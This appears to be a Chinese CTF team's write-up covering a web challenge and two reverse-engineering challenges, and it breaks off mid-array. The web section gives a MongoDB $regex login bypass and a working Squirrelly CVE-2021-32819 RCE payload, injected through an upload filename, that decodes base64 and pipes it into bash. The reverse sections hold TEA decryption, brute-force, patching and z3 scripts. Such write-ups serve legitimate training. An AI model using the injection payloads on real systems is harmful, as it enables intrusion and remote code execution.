EDI
JOIN US ▶▶▶
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn misc方向的师傅)有意向的师傅请联系邮箱[email protected]、[email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。
点击蓝字 · 关注我们
1
EzNode2
首先是通过MongoDB注入绕过登录,过滤如下:
function filter(str) {return /gt|lt|lte|gte|eq|ne|where/.test(str)}
没有过滤 $regex ,然后根据html源码可知用户名为admin,所以payload为:
{"username":{"$regex":"^admi"},"password": {"$regex":".*"}}绕过登录后是一个文件上传,审计代码可知文件信息会被渲染到页面中。
data.output = '{"id":"3", "filename":"' + req.files.file.name + '", "filesize":"' + req.files.file.size + '", "mimetype":"' + req.files.file.mimetype + '", "filehash":"' + req.files.file.md5 + '"}'res.render('home.squirrelly', JSON.parse(data.output));
这里拼接json字符串再用 JSON.parse 解析显得很多此一举,并且其中的 name 和 mimetype 都是可以控制的,显然存在属性注入。
再查看使用的引擎为 squirrelly 搜索可知该引擎存在渲染漏洞 CVE-2021-32819 ,该漏洞简单的说就是渲染时给一个 defaultFilter 属性,该属性会注入到代码中执行也就造成了RCE。那么思路就是在json拼接时注入一个 defaultFilter 即可。
最终payload就是:
QQ.jpg","autoEscape":false,"defaultFilter":"e');require = global.require || global.process.mainModule.constructor._load; require('child_process').exec('echo L2J....Q==|base64 -d|bash');c.l('F','e位置在文件名处:
1
babytea
魔改tea加密
四处魔改
解密脚本如下
#include <stdio.h>#include <stdint.h>unsigned int dword_69F038 = 0x1234567;unsigned int dword_69F03C = 0x89ABCDEF;//解密函数void decrypt (uint32_t* v, uint32_t* k,uint32_t Xor1,uint32_t Xor2) {uint32_t v0=v[0], v1=v[1], sum=0, i; /* set up */uint32_t delta=0x9E3779B1; /* a key schedule constant */uint32_t k0=k[0], k1=k[1], k2=k[2], k3=k[3]; /* cache key */dword_69F038 = v0;dword_69F03C = v1;uint32_t summ[0x20] = {0};for(i = 0;i<=31;i++){sum += delta;if((sum >> 0x1f) == 0){sum ^= 0x1234567;}summ[i] = sum;}for (i=0; i<32; i++) { /* basic cycle start */v1 -= ((v0<<4) + k2) ^ (v0 + summ[31-i]) ^ ((v0>>5) + k3);v0 -= ((v1<<4) + k0) ^ (v1 + summ[31-i]) ^ ((v1>>5) + k1);}v0 ^= Xor1;v1 ^= Xor2;v[0]=v0; v[1]=v1;}void hexdump(unsigned int * t1,unsigned int *t2){for(int i = 0;i<4;i++){printf("%c",((unsigned char *)t1)[i]);}for(int i = 0;i<4;i++){printf("%c",((unsigned char *)t2)[i]);}}void Tea(){unsigned int cip[8] = {0x5E27B530, 0xBDBEF7F3, 0xE3516A8F, 0x5D836CFE, 0xD83DFA09, 0x8EFC737A, 0x55A853A3, 0x7A564EC5};unsigned int key[4] = {0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476};unsigned int Xor0[8] = {0x1234567,0x5E27B530,0xE3516A8F,0xD83DFA09};unsigned int Xor1[8] = {0x89ABCDEF,0xBDBEF7F3,0x5D836CFE,0x8EFC737A};for(int i = 0;i<=3;i++){uint32_t v[2];v[0] = cip[i * 2];v[1] = cip[i*2 +1];decrypt(v, key,Xor0[i],Xor1[i]);// printf("%x %xn",v[0],v[1]);hexdump(&v[0],&v[1]);}}int main(){Tea();return 0;}
flag即为:
600d_y0u_r34lly_kn0w_734_4nd_53h
2
babysmc
smc自解密,需要我们输入正确的字符,才能解密成功,没办法,只能爆破所有可见字符
利用capstone 进行进一步的筛选
脚本如下
from struct import *from capstone import *code = "74AACDA2CD29E664DD2121212199202121214AE921AA7429E7252B23AA64DDA2E120A864DD9820212121E0C021AA7429E7252B22AA64DDA2E120A864DDE664D925212121CA28AA6CD9A2E020A86CD9A25CD93F5610A25CDD2B5323CA08AA74D973C97BDEDEDEA2E5252E97E1A4E15535AA6C29226CDDAB74D9A930AA64DDA2E120A864DDCAE1AAC47CE2EDEDEDEDEDED5789EE81EE16A3FE3C400231C78B47FE680868028F47F252EA7139020281C60E8F4FF253EA45FDFDFD81C606C547EE02020202E90B8957EE81C0038B57EE817FEE08711C89470E52894F0A538957EE0DB44617F2890E87823C4002FDD381C60AE9D1894FFE31CFEAEC2D020289E75FC1"xcode = bytes.fromhex(code)print(hex(len(xcode)))for XOr in range(28,126):x32code = b""for j in range(len(xcode)):x32code += pack("B",xcode[j] ^ XOr)if XOr == 0x21:for i in range(len(x32code)):print(hex(x32code[i]),end = ",")CP = Cs(CS_ARCH_X86, CS_MODE_32)for p in CP.disasm(x32code, 0x04017C0):# if XOr == 0x21:if p.address > 0x04017C0 + 0x90 - 0x10:print(f"{hex(XOr)} => ")print()for q in CP.disasm(x32code, 0x04017C0):print("0x%x:t%st%s" %(q.address, q.mnemonic, q.op_str))breakfrom struct import *from capstone import *code = "76A8CFA0CF3782DF1D612310E6AA66DF49294923AE66D373CB50182323A0E72FAE6ED372CB64DCDCDCA0E727E466CF23232323C82AA876CFA0E122AA76CFA05ECF29503DA8662F73A86E2B72A876CF2C956736D3A82FA6A31D6123DCF2A0E72BC8F0A86EDF10EECBCD0C2323A8C67EE076A8CF759B2723232348EB2F992223232348E120A8762B2C95272148F3249B2223232348E326A8562B2C9527254AE39C23232320F39B2223232348E328A8562B2C9527254AE39623232320F39B22232323F2C3A8562B2C95272548E33120F39B2223232348E325A8562B2C95272548E35F20F39B22232323E2C323A8562B2C95272548E30A20F39B2223232348E323A8"xcode = bytes.fromhex(code)print(hex(len(xcode)))for XOr in range(20,126):x32code = b""for j in range(len(xcode)):x32code += pack("B",xcode[j] ^ XOr)if XOr == 0x23:for i in range(len(x32code)):print(hex(x32code[i]),end = ",")CP = Cs(CS_ARCH_X86, CS_MODE_32)for p in CP.disasm(x32code, 0x0401850):# if XOr == 0x21:if p.address > 0x0401850 + 0x100 - 0x10:print(f"{hex(XOr)} => ")print()for q in CP.disasm(x32code, 0x0401850):print("0x%x:t%st%s" %(q.address, q.mnemonic, q.op_str))break
爆破出第一段自解密的 异或值为 0x23 , 第二段为0x21
patch,恢复原来的指令
import idcdata = [0x55,0x8b,0xec,0x83,0xec,0x8,0xc7,0x45,0xfc,0x0,0x0,0x0,0x0,0xb8,0x1,0x0,0x0,0x0,0x6b,0xc8,0x0,0x8b,0x55,0x8,0xc6,0x4,0xa,0x2,0x8b,0x45,0xfc,0x83,0xc0,0x1,0x89,0x45,0xfc,0xb9,0x1,0x0,0x0,0x0,0xc1,0xe1,0x0,0x8b,0x55,0x8,0xc6,0x4,0xa,0x3,0x8b,0x45,0xfc,0x83,0xc0,0x1,0x89,0x45,0xfc,0xc7,0x45,0xf8,0x4,0x0,0x0,0x0,0xeb,0x9,0x8b,0x4d,0xf8,0x83,0xc1,0x1,0x89,0x4d,0xf8,0x83,0x7d,0xf8,0x1e,0x77,0x31,0x83,0x7d,0xfc,0xa,0x72,0x2,0xeb,0x29,0x8b,0x55,0xf8,0x52,0xe8,0x5a,0xff,0xff,0xff,0x83,0xc4,0x4,0xf,0xb6,0xc0,0x85,0xc0,0x74,0x14,0x8b,0x4d,0x8,0x3,0x4d,0xfc,0x8a,0x55,0xf8,0x88,0x11,0x8b,0x45,0xfc,0x83,0xc0,0x1,0x89,0x45,0xfc,0xeb,0xc0,0x8b,0xe5,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0x76,0xa8,0xcf,0xa0,0xcf,0x37,0x82,0xdf,0x1d,0x61,0x23,0x10,0xe6,0xaa,0x66,0xdf,0x49,0x29,0x49,0x23,0xae,0x66,0xd3,0x73,0xcb,0x50,0x18,0x23,0x23,0xa0,0xe7,0x2f,0xae,0x6e,0xd3,0x72,0xcb,0x64,0xdc,0xdc,0xdc,0xa0,0xe7,0x27,0xe4,0x66,0xcf,0x23,0x23,0x23,0x23,0xc8,0x2a,0xa8,0x76,0xcf,0xa0,0xe1,0x22,0xaa,0x76,0xcf,0xa0,0x5e,0xcf,0x29,0x50,0x3d,0xa8,0x66,0x2f,0x73,0xa8,0x6e,0x2b,0x72,0xa8,0x76,0xcf,0x2c,0x95,0x67,0x36,0xd3,0xa8,0x2f,0xa6,0xa3,0x1d,0x61,0x23,0xdc,0xf2,0xa0,0xe7,0x2b,0xc8,0xf0,0xa8,0x6e,0xdf,0x10,0xee,0xcb,0xcd,0xc,0x23,0x23,0xa8,0xc6,0x7e,0xe0]def Patch(begin,end,Xor):for i in range(begin,end):idc.patch_byte(i,Xor[i-begin])beginn = 0x04017C0endd = beginn + len(data)Patch(beginn,endd,data)0x23import idcdata = [0x55,0x8b,0xec,0x83,0xec,0x8,0xc7,0x45,0xfc,0x0,0x0,0x0,0x0,0xb8,0x1,0x0,0x0,0x0,0x6b,0xc8,0x0,0x8b,0x55,0x8,0xc6,0x4,0xa,0x2,0x8b,0x45,0xfc,0x83,0xc0,0x1,0x89,0x45,0xfc,0xb9,0x1,0x0,0x0,0x0,0xc1,0xe1,0x0,0x8b,0x55,0x8,0xc6,0x4,0xa,0x3,0x8b,0x45,0xfc,0x83,0xc0,0x1,0x89,0x45,0xfc,0xc7,0x45,0xf8,0x4,0x0,0x0,0x0,0xeb,0x9,0x8b,0x4d,0xf8,0x83,0xc1,0x1,0x89,0x4d,0xf8,0x83,0x7d,0xf8,0x1e,0x77,0x31,0x83,0x7d,0xfc,0xa,0x72,0x2,0xeb,0x29,0x8b,0x55,0xf8,0x52,0xe8,0x5a,0xff,0xff,0xff,0x83,0xc4,0x4,0xf,0xb6,0xc0,0x85,0xc0,0x74,0x14,0x8b,0x4d,0x8,0x3,0x4d,0xfc,0x8a,0x55,0xf8,0x88,0x11,0x8b,0x45,0xfc,0x83,0xc0,0x1,0x89,0x45,0xfc,0xeb,0xc0,0x8b,0xe5,0x5d,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0x76,0xa8,0xcf,0xa0,0xcf,0x37,0x82,0xdf,0x1d,0x61,0x23,0x10,0xe6,0xaa,0x66,0xdf,0x49,0x29,0x49,0x23,0xae,0x66,0xd3,0x73,0xcb,0x50,0x18,0x23,0x23,0xa0,0xe7,0x2f,0xae,0x6e,0xd3,0x72,0xcb,0x64,0xdc,0xdc,0xdc,0xa0,0xe7,0x27,0xe4,0x66,0xcf,0x23,0x23,0x23,0x23,0xc8,0x2a,0xa8,0x76,0xcf,0xa0,0xe1,0x22,0xaa,0x76,0xcf,0xa0,0x5e,0xcf,0x29,0x50,0x3d,0xa8,0x66,0x2f,0x73,0xa8,0x6e,0x2b,0x72,0xa8,0x76,0xcf,0x2c,0x95,0x67,0x36,0xd3,0xa8,0x2f,0xa6,0xa3,0x1d,0x61,0x23,0xdc,0xf2,0xa0,0xe7,0x2b,0xc8,0xf0,0xa8,0x6e,0xdf,0x10,0xee,0xcb,0xcd,0xc,0x23,0x23,0xa8,0xc6,0x7e,0xe0]def Patch(begin,end,Xor):for i in range(begin,end):idc.patch_byte(i,Xor[i-begin])
结果:
剩下的就很简单了,利用z3求解器可以很快解出(尝试了用angr,但没有梭出来,可能是脚本写的有点问题。
exp:
from z3 import *input = [BitVec(f"input[{i}]",8) for i in range(16)]dword_422000 = [0x0002A81A, 0x00028D44, 0x00022653, 0x0002E993, 0x000249B5, 0x00024265, 0x0003253D, 0x0002D77B, 0x000282C8, 0x00022892, 0x0002BD54, 0x0002482E, 0x00024C1F, 0x00028127, 0x0001E62E, 0x0001F009]Sol = Solver()Sol.add(dword_422000[12] == (199 * input[9]+ 98 * input[7]+ 192 * input[8]+ 23 * input[12]+ 79 * input[14]+ 77 * input[10]+ 185 * input[13]+ 135 * input[15]+ 119 * input[4]+ 54 * input[0]+ 41 * input[1]+ 124 * input[6]+ 18 * input[2]+ 181 * input[11]+ 191 * input[5]+ 7 * input[3]) & 0xffffffff )Sol.add(dword_422000[3] == (210 * input[11]+ 26 * input[15]+ 169 * input[0]+ 177 * input[13]+ input[6]+ 205 * input[8]+ 223 * input[10]+ 32 * input[5]+ 225 * input[3]+ 61 * input[14]+ 72 * input[1]+ 186 * input[9]+ 253 * input[12]+ 205 * input[2]+ 49 * input[4]+ 232 * input[7] ) & 0xffffffff )Sol.add(dword_422000[13] == (192 * input[3]+ 22 * input[10]+ 175 * input[1]+ 184 * input[7]+ 116 * input[15]+ 70 * input[13]+ 153 * input[14]+ 119 * input[0]+ 217 * input[6]+ 123 * input[5]+ 17 * input[2]+ 244 * input[12]+ 116 * input[8]+ 46 * input[4]+ 19 * input[9]+ 130 * input[11])& 0xffffffff )Sol.add (dword_422000[7] == (41 * input[12]+ 71 * input[7]+ 185 * input[1]+ 69 * input[11]+ 142 * input[8]+ 221 * input[5]+ 24 * input[3]+ 208 * input[6]+ 41 * input[9]+ 159 * input[2]+ 231 * input[14]+ 235 * input[13]+ 225 * input[0]+ (input[4] << 6)+ 162 * input[10]+ 134 * input[15] )& 0xffffffff )Sol.add (dword_422000[11] == (36 * input[12]+ 220 * input[4]+ 110 * input[13]+ 45 * input[7]+ 123 * input[9]+ 133 * input[1]+ 101 * input[5]+ 137 * input[10]+ 102 * input[0]+ 227 * input[14]+ 94 * input[15]+ 18 * input[2]+ 22 * input[6]+ 189 * input[11]+ 218 * input[8])& 0xffffffff )Sol.add (dword_422000[15] == (86 * input[11]+ 31 * input[9]+ 229 * input[6]+ 27 * input[3]+ 6 * input[12]+ 13 * input[10]+ 158 * input[1]+ 89 * input[7]+ 35 * input[15]+ 126 * input[8]+ 165 * input[13]+ 220 * input[0]+ 138 * input[5]+ 100 * input[4]+ 84 * input[14]+ 175 * input[2]) & 0xffffffff )Sol.add(dword_422000[8] == ( 7 * input[1]+ 28 * input[8]+ 131 * input[10]+ 6 * input[6]+ 254 * input[0]+ 130 * input[13]+ 124 * input[3]+ 55 * input[12]+ 157 * input[14]+ 175 * input[5]+ 140 * input[4]+ 241 * input[9]+ 11 * input[11]+ 211 * input[2]+ 121 * input[7]+ 200 * input[15] ) & 0xffffffff )Sol.add(dword_422000[6] == (195 * input[14]+ 197 * input[13]+ 218 * input[7]+ 83 * input[1]+ 98 * input[2]+ 70 * input[10]+ 229 * input[15]+ 148 * input[11]+ 195 * input[0]+ 94 * input[6]+ 211 * input[12]+ 220 * input[9]+ 81 * input[5]+ 253 * input[8]+ 78 * input[4]+ 4 * input[3] ) & 0xffffffff )Sol.add(dword_422000[14] == (3 * input[4]+ 136 * input[7]+ 156 * input[3]+ 189 * input[1]+ 244 * input[12]+ 157 * input[15]+ 83 * input[9]+ 6 * input[0]+ 113 * input[6]+ 63 * input[14]+ 35 * input[2]+ 22 * input[8]+ 26 * input[10]+ 62 * input[11]+ 98 * input[5]+ 110 * input[13] )& 0xffffffff )Sol.add(dword_422000[4] == (96 * input[4]+ 248 * input[8]+ 191 * input[9]+ 194 * input[2]+ 154 * input[1]+ 31 * input[6]+ 157 * input[7]+ 248 * input[13]+ 81 * input[15]+ 56 * input[10]+ 52 * input[0]+ 94 * input[12]+ 212 * input[5]+ 83 * input[3]+ 83 * input[14]+ 158 * input[11] )& 0xffffffff )Sol.add(dword_422000[1] == (67 * input[4]+ 220 * input[2]+ 123 * input[11]+ 168 * input[5]+ 23 * input[12]+ 148 * input[7]+ 127 * input[10]+ 194 * input[1]+ 132 * input[8]+ 44 * input[0]+ 60 * input[13]+ 98 * input[15]+ 38 * input[14]+ 245 * input[9]+ 159 * input[6]+ 146 * input[3] )& 0xffffffff )Sol.add(dword_422000[5] == (132 * input[3]+ 10 * input[7]+ 95 * input[0]+ 83 * input[10]+ 99 * input[1]+ 77 * input[12]+ 195 * input[2]+ 47 * input[6]+ 38 * input[13]+ 178 * input[8]+ 74 * input[4]+ 86 * input[11]+ 208 * input[9]+ 240 * input[14]+ 120 * input[5]+ 43 * input[15] )& 0xffffffff )Sol.add(dword_422000[9] == (172 * input[1]+ 110 * input[2]+ 92 * input[7]+ 126 * input[15]+ 91 * input[0]+ 77 * input[6]+ 207 * input[5]+ 249 * input[11]+ 240 * input[12]+ 129 * input[10]+ 6 * input[13]+ 100 * input[3]+ input[14]+ 76 * input[9]+ 127 * input[4]+ 4 * input[8] )& 0xffffffff )Sol.add(dword_422000[10] == (46 * input[15]+ 37 * input[0]+ 3 * input[3]+ 72 * input[6]+ 116 * input[7]+ 186 * input[1]+ 221 * input[14]+ 236 * input[4]+ 79 * input[2]+ 175 * input[10]+ 184 * input[9]+ 160 * input[11]+ 227 * input[12]+ 99 * input[8]+ 71 * input[13]+ 4 * input[5] )& 0xffffffff )Sol.add(dword_422000[0] == (203 * input[3]+ 31 * input[0]+ 11 * input[14]+ 149 * input[7]+ 215 * input[5]+ 206 * input[1]+ 245 * input[6]+ 9 * input[11]+ 16 * input[10]+ 241 * input[13]+ 110 * input[8]+ 175 * input[2]+ 38 * input[4]+ 227 * input[9]+ 208 * input[12]+ 8 * input[15] )& 0xffffffff )Sol.add(dword_422000[2] == (132 * input[3]+ 119 * input[14]+ 26 * input[8]+ 24 * input[6]+ 121 * input[11]+ 235 * input[2]+ 228 * input[12]+ 34 * input[5]+ 37 * input[15]+ 24 * input[9]+ 145 * input[13]+ 199 * input[4]+ 173 * input[10]+ 58 * input[0]+ 246 * input[7]+ 199 * input[1]) & 0xffffffff )assert Sol.check() == satprint(Sol.model())input = [None] * 16input[11] = 51input[0] = 90input[2] = 1input[14] = 114input[6] = 186input[13] = 43input[5] = 42input[4] = 43input[12] = 113input[15] = 72input[1] = 45input[10] = 186input[9] = 179input[7] = 51input[8] = 72input[3] = 51idx = [0x02, 0x03, 0x05, 0x07, 0x0B, 0x0D, 0x11, 0x13, 0x17, 0x1D]byte_423D80 = [0xD1, 0x9C, 0x68, 0xC0, 0x13, 0xAC, 0x48, 0x32, 0xA3, 0xBA, 0x4C, 0xE7, 0x6D, 0xC8, 0x1C, 0xAB, 0xE2, 0x7A, 0x42, 0xE1, 0x7B, 0x16, 0x67, 0x03, 0xAE, 0x7E, 0xAA, 0x38, 0x22, 0x02, 0x39, 0x51, 0xC7, 0x79, 0xD7, 0xCB, 0xEF, 0x62, 0x98, 0xDC, 0x53, 0x72, 0x89, 0xA5, 0x4B, 0xC6, 0x86, 0xF6, 0xFC, 0x77, 0x5A, 0xF5, 0x2E, 0x3D, 0xB2, 0xFE, 0x59, 0x27, 0x80, 0x63, 0xDD, 0x1A, 0x12, 0x5E, 0xED, 0xB0, 0xBC, 0xC4, 0x5F, 0x11, 0xC9, 0x09, 0xC5, 0x75, 0x96, 0x0A, 0x2F, 0x00, 0x17, 0x81, 0x14, 0x47, 0xBB, 0x9D, 0x8E, 0x3C, 0xD6, 0xA1, 0xE0, 0xA2, 0x26, 0x5D, 0x08, 0x6E, 0x4E, 0xF1, 0xCF, 0x73, 0x8A, 0x90, 0x0B, 0xB3, 0x3E, 0xB6, 0x1F, 0xC3, 0xB7, 0xDA, 0x8D, 0x05, 0xEE, 0x18, 0x93, 0x3A, 0x6A, 0x8C, 0x43, 0x8F, 0xEB, 0xE9, 0x5B, 0x29, 0x37, 0x1E, 0x46, 0x33, 0x31, 0xFB, 0x35, 0x34, 0x61, 0x04, 0x0E, 0x2B, 0x74, 0xF9, 0x8B, 0x2C, 0x20, 0x0C, 0x7C, 0x28, 0x5C, 0xCA, 0xE6, 0x6B, 0xD8, 0x30, 0xE4, 0x21, 0x44, 0x70, 0x06, 0xA6, 0x60, 0x41, 0x84, 0x10, 0x95, 0x4F, 0x64, 0x83, 0xD2, 0x9A, 0xBE, 0xAF, 0x9F, 0x07, 0xC1, 0xB8, 0x3B, 0x65, 0xCC, 0x57, 0xB5, 0xD9, 0x92, 0xDE, 0x0D, 0xE3, 0xF3, 0xA4, 0xBD, 0x6F, 0xD3, 0x25, 0x88, 0x71, 0xFF, 0xA9, 0x36, 0xB1, 0x78, 0x24, 0x69, 0xAD, 0x19, 0xBF, 0xFD, 0xCD, 0x4A, 0xEA, 0x87, 0x91, 0xA8, 0x66, 0x82, 0x50, 0x0F, 0x99, 0x45, 0xF2, 0xD5, 0x9B, 0x94, 0x7D, 0xCE, 0xDB, 0xB9, 0x52, 0xE5, 0xF4, 0x01, 0x7F, 0xD4, 0x15, 0x2D, 0x3F, 0x1D, 0xA7, 0xC2, 0xFA, 0x40, 0xE8, 0xA0, 0x55, 0x6C, 0xF7, 0x1B, 0x58, 0x85, 0x56, 0x9E, 0xEC, 0x97, 0x23, 0xF0, 0x4D, 0xD0, 0xF8, 0x2A, 0x49, 0xB4, 0x76, 0x54, 0xDF]def Fun_0x1d():for i in range(len(input)):for j in range(len(byte_423D80)):if byte_423D80[j] == input[i]:input[i] = jbreakbyte_423780 = [0x38, 0x5A, 0xC7, 0x98, 0x15, 0x6A, 0xC9, 0x28, 0x33, 0xEA, 0xF4, 0xD9, 0xDB, 0x77, 0xB8, 0x49, 0x1B, 0x79, 0xF5, 0xFD, 0x3E, 0xA2, 0xDE, 0x17, 0xC4, 0x5E, 0xE5, 0x11, 0xB6, 0x1D, 0x86, 0xF9, 0x90, 0x78, 0x8A, 0x14, 0x12, 0xB1, 0xC2, 0x21, 0xF1, 0x02, 0x58, 0xA1, 0x23, 0x0C, 0xAD, 0xA5, 0x50, 0x48, 0x1E, 0x6D, 0xF8, 0x96, 0x9D, 0x19, 0x00, 0xBD, 0x26, 0xCE, 0xA7, 0x24, 0x2E, 0x39, 0x7B, 0xFA, 0x5F, 0xCC, 0x1A, 0x0B, 0x40, 0x0F, 0x4B, 0x82, 0xE2, 0x97, 0x10, 0x2A, 0xFC, 0x3B, 0xB2, 0x66, 0x27, 0x54, 0x07, 0xE3, 0x08, 0xA3, 0xA6, 0xED, 0x62, 0x13, 0x9C, 0x20, 0x01, 0x92, 0xE8, 0xAE, 0xBE, 0xE1, 0x0A, 0x41, 0x94, 0x80, 0xA9, 0x2F, 0x29, 0x70, 0x35, 0x16, 0xF7, 0x6B, 0xFE, 0x9E, 0x0D, 0xD3, 0x7F, 0x1F, 0xA0, 0x32, 0xD2, 0x52, 0x05, 0x76, 0x89, 0x9B, 0x7A, 0x8F, 0x99, 0xEF, 0xCF, 0x51, 0x0E, 0xEC, 0x59, 0x5C, 0x37, 0xD5, 0x8E, 0x31, 0x34, 0x2D, 0x93, 0x25, 0x1C, 0xC8, 0x5B, 0x47, 0x9F, 0x03, 0x67, 0x7E, 0x42, 0x7D, 0x3A, 0xAA, 0x57, 0xDA, 0x9A, 0xAB, 0x74, 0x72, 0xE4, 0xB7, 0x5D, 0xCD, 0x87, 0x46, 0x2B, 0x43, 0xF3, 0xD0, 0x85, 0x55, 0xBB, 0xD4, 0xC6, 0x61, 0x56, 0x04, 0x65, 0x7C, 0x88, 0xC3, 0x73, 0xBC, 0xEB, 0xDD, 0x4D, 0xE0, 0xE6, 0xC0, 0x63, 0x8D, 0xF2, 0x81, 0xF6, 0xA8, 0x3D, 0x3F, 0xA4, 0xE9, 0x4A, 0xB5, 0xF0, 0xCA, 0x8B, 0x2C, 0xD7, 0xAC, 0xC5, 0xC1, 0xBF, 0x53, 0xD1, 0x6F, 0x06, 0xE7, 0xD6, 0x09, 0x95, 0x44, 0x71, 0xB9, 0x83, 0x4C, 0x22, 0xAF, 0xB4, 0x75, 0x36, 0x30, 0xCB, 0xEE, 0x91, 0x45, 0x8C, 0x4E, 0x6E, 0x6C, 0x4F, 0x84, 0xBA, 0xFF, 0x64, 0xB3, 0x60, 0xFB, 0xB0, 0x18, 0xD8, 0xDF, 0x3C, 0x68, 0xDC, 0x69]def Fun_0x17():for i in range(len(input)):for j in range(len(byte_423780)):if byte_423780[j] == input[i]:input[i] = jbreakbyte_423380 = [0x91, 0x67, 0x1A, 0xBE, 0xAB, 0xC2, 0x85, 0xD5, 0xDA, 0xCC, 0xF7, 0x5B, 0x54, 0x61, 0x05, 0xDF, 0x02, 0x70, 0x65, 0x69, 0x9A, 0x7A, 0x09, 0x92, 0x5D, 0x2A, 0xA7, 0x37, 0xFF, 0x19, 0xE6, 0x99, 0xF3, 0x1E, 0xBD, 0x82, 0x48, 0x3C, 0xE8, 0xC8, 0x66, 0x17, 0xB7, 0xA9, 0xC5, 0x4E, 0x33, 0x84, 0x45, 0xD3, 0x8B, 0x49, 0x50, 0x43, 0x8F, 0xCD, 0x73, 0x29, 0x04, 0xDC, 0x01, 0x0C, 0xDD, 0x2E, 0xFB, 0x6E, 0x0F, 0x24, 0x57, 0xE9, 0xC9, 0x7D, 0xB3, 0x40, 0x4B, 0x56, 0x6C, 0x68, 0xE2, 0x22, 0xF6, 0x80, 0xAA, 0x95, 0xD4, 0x97, 0x94, 0x21, 0x53, 0xD1, 0xE3, 0x59, 0xD2, 0xED, 0x41, 0x4D, 0x74, 0xA3, 0xA0, 0x32, 0x0D, 0xFC, 0x46, 0x34, 0xFA, 0xB1, 0x5E, 0xC6, 0x71, 0xC0, 0xE0, 0x3F, 0x13, 0x12, 0xD7, 0xEE, 0xF8, 0x26, 0xE1, 0x25, 0x88, 0x77, 0xB0, 0x8D, 0x6A, 0xEA, 0x0E, 0xD6, 0x3E, 0x03, 0x64, 0xBF, 0x8C, 0x96, 0xD9, 0xA4, 0x42, 0xAD, 0xFD, 0x16, 0x5A, 0xE4, 0x06, 0x9D, 0x07, 0x87, 0x5F, 0xAF, 0xDB, 0xC1, 0x93, 0x1C, 0xF1, 0xDE, 0xA6, 0x3A, 0xF4, 0x2C, 0x1B, 0x39, 0xE7, 0x4A, 0xC7, 0x35, 0xFE, 0x0A, 0x62, 0xF0, 0xCA, 0xEC, 0x27, 0x52, 0x23, 0x7F, 0xA5, 0x79, 0x7C, 0x75, 0x86, 0xEB, 0x60, 0xA8, 0xF5, 0x1F, 0x20, 0xC3, 0x63, 0x5C, 0x72, 0x18, 0xE5, 0x51, 0xAC, 0xB9, 0x90, 0x9F, 0x4C, 0xB2, 0xCB, 0x00, 0x6F, 0x28, 0xA1, 0xB6, 0x9B, 0xD0, 0x7B, 0x36, 0x4F, 0x9C, 0xCF, 0x98, 0x8A, 0x0B, 0x78, 0xB4, 0x7E, 0x2B, 0xEF, 0x58, 0xB5, 0xBA, 0x55, 0xB8, 0x10, 0x2F, 0x44, 0xAE, 0x89, 0x08, 0xC4, 0x3B, 0x9E, 0xF9, 0x6D, 0xF2, 0x15, 0x1D, 0x30, 0x47, 0x8E, 0x31, 0x2D, 0xD8, 0x6B, 0x3D, 0x11, 0x14, 0xA2, 0x83, 0xCE, 0xBB, 0x81, 0xBC, 0x76, 0x38]def Fun_0x13():for i in range(len(input)):for j in range(len(byte_423380)):if byte_423380[j] == input[i]:input[i] = jbreakbyte_423180 = [0xE8, 0x22, 0x64, 0x9F, 0xC5, 0xD5, 0x25, 0xC9, 0x5D, 0xDF, 0xA1, 0x74, 0xCB, 0x57, 0xF7, 0xF0, 0xBD, 0x56, 0xFF, 0x33, 0x79, 0xFE, 0x87, 0xB6, 0xB1, 0x54, 0x10, 0x95, 0x8A, 0xEC, 0x7B, 0x48, 0x84, 0x3D, 0x30, 0xEF, 0x86, 0xFA, 0x97, 0x1C, 0xDC, 0xA9, 0x5A, 0xF3, 0x67, 0x18, 0x83, 0x72, 0x06, 0xB9, 0xF5, 0x05, 0x68, 0x59, 0xF2, 0xE4, 0x88, 0x5E, 0x14, 0x17, 0x11, 0x9C, 0xAB, 0xDE, 0xEB, 0x7D, 0x62, 0x9B, 0xD6, 0xF4, 0x01, 0x29, 0xBC, 0xC0, 0x69, 0xA2, 0x2B, 0x0D, 0x1D, 0x98, 0x6A, 0xBE, 0x65, 0x09, 0xF8, 0x96, 0xB4, 0x6E, 0x63, 0xE3, 0x34, 0x2D, 0xCE, 0x0A, 0xCD, 0xAA, 0x21, 0xCC, 0xE7, 0xA5, 0xDB, 0xD8, 0x03, 0xDD, 0xB2, 0x1F, 0x9D, 0x9E, 0x0E, 0x8F, 0x8B, 0xCA, 0x92, 0x0B, 0xA7, 0x5B, 0xD2, 0xCF, 0x47, 0x07, 0x04, 0xAE, 0x3B, 0xA8, 0x7C, 0x73, 0xF9, 0x35, 0xEE, 0x7A, 0xB0, 0xBA, 0x85, 0x46, 0x3E, 0x81, 0xC7, 0x40, 0x37, 0x15, 0x3A, 0x19, 0xE0, 0x1E, 0x28, 0x4A, 0x4F, 0x8C, 0xD4, 0x51, 0x2E, 0x94, 0x89, 0x2A, 0x0F, 0x7E, 0xE1, 0xC8, 0x5F, 0x4E, 0x6D, 0xF6, 0x49, 0xB8, 0x55, 0x60, 0x82, 0x20, 0x36, 0xC1, 0x0C, 0x1B, 0xC4, 0x00, 0xE5, 0xA3, 0x2C, 0xE9, 0xC2, 0xF1, 0x23, 0x3F, 0xC3, 0xB5, 0x8D, 0xD7, 0x42, 0xFC, 0x50, 0x13, 0xBB, 0x61, 0x9A, 0x44, 0xE6, 0x91, 0x2F, 0x70, 0xC6, 0x6F, 0xD1, 0x27, 0x43, 0x08, 0xDA, 0xFD, 0x52, 0x71, 0x77, 0xED, 0xE2, 0xAD, 0x16, 0x8E, 0x12, 0x4C, 0x31, 0x3C, 0x39, 0x78, 0x90, 0xBF, 0x1A, 0x76, 0x75, 0x41, 0x99, 0xD0, 0x80, 0xB7, 0x66, 0x24, 0xD3, 0x7F, 0x4B, 0x45, 0x5C, 0x53, 0x4D, 0x26, 0x32, 0xA0, 0xFB, 0xB3, 0x38, 0x6B, 0xAF, 0xA6, 0xD9, 0x02, 0xA4, 0xEA, 0x6C, 0xAC, 0x58, 0x93]def Fun_0x11():for i in range(len(input)):for j in range(len(byte_423180)):if byte_423180[j] == input[i]:input[i] = jbreakbyte_422D80 = [0xB0, 0x28, 0x0B, 0x89, 0x4B, 0xA4, 0xBE, 0x1A, 0x8F, 0x6C, 0xCF, 0xB2, 0xB5, 0xFE, 